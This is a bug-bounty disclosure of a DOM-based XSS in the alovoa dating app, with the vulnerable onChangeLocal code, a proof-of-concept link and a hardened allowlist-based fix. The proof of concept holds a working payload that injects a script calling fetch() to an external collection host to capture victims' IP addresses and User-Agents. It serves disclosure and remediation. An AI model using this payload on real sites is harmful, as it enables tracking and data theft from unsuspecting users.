Cross-site Scripting (XSS) - DOM in alovoa/alovoa

Valid
Reported on Jul 19th 2021

✍️ Description

It is possible to run JavaScript code in the webpage through unsanitized DOM properties. The function onChangeLocal sets the value of window.location.search directly from the URL, without any prior checks.

🕵️‍♂️ Proof of Concept

```html
<!-- Vulnerable function in file fragments.html:139 -->
<script>
function onChangeLocal(e) {
  // Reads the selected <option> value and writes it straight into the query string, unchecked
  let val = e.options[e.selectedIndex].value;
  console.log(val);
  window.location.search = val;
}
</script>
```

A quick example: obtaining the IP address and User-Agent of a victim. The attacker sets up a web server; for PoC purposes, a Pipedream URL was used: https://en8ysa1cvfw0x29.m.pipedream.net

The attacker then sends the following link to the victim: https://alovoa.com/?lang=es"><script>fetch("https://en8ysa1cvfw0x29.m.pipedream.net")</script>

So val is set to the malicious payload.

When the victim opens the link, the attacker gets the IP and User-Agent.


💥 Impact

An attacker could use this to make users open a malicious link and then obtain personal information or perform other malicious actions.
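A hardened version of the handler shown above, added here as an example and not code from the alovoa project: instead of writing the raw option value into window.location.search, it accepts only allowlisted language codes and rebuilds the query string with URLSearchParams. The allowlist and the function names are assumptions for illustration.

```javascript
// Assumed set of supported language codes (illustrative, not from the project).
const ALLOWED_LANGS = new Set(["en", "de", "es", "fr"]);

// Extract the "lang" parameter from an option value such as "?lang=es".
// Returns null for anything that is not a simple, allowlisted code.
function parseLangOption(val) {
  if (typeof val !== "string") return null;
  const params = new URLSearchParams(val.startsWith("?") ? val.slice(1) : val);
  const lang = params.get("lang");
  if (lang === null) return null;
  // Strict shape check first: exactly two lowercase letters, nothing else.
  if (!/^[a-z]{2}$/.test(lang)) return null;
  return ALLOWED_LANGS.has(lang) ? lang : null;
}

// Build the query string to navigate to, or null if the value was rejected.
// Any extra parameters smuggled into the option value are dropped.
function safeLangQuery(val) {
  const lang = parseLangOption(val);
  if (lang === null) return null;
  const params = new URLSearchParams();
  params.set("lang", lang);
  return "?" + params.toString();
}

// Hardened replacement for onChangeLocal; `e` is the <select> element.
function onChangeLocalSafe(e) {
  const query = safeLangQuery(e.options[e.selectedIndex].value);
  if (query === null) {
    console.warn("rejected unexpected language option");
    return;
  }
  window.location.search = query;
}
```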

Ileana Barrionuevo modified their report
7 days ago
We have contacted a member of the alovoa team and are waiting to hear back 7 days ago
Nho Quy Dinh validated this vulnerability 7 days ago
Ileana Barrionuevo has been awarded the disclosure bounty
$25
The fix bounty is now up for grabs
$6.25
Nho Quy Dinh confirmed that a fix has been merged on 01ae69 7 days ago
Nho Quy Dinh has been awarded the fix bounty
$6.25
amammad
7 days ago

Dear Ileana Barrionuevo, I don't like to find bugs on repositories that someone is already working on, so if you let me, I'll work on Alovoa. Your friend, Amammad.

Ileana (Researcher)
7 days ago

Hi Amammad, I don't have any problem :) Four eyes see better than two. :D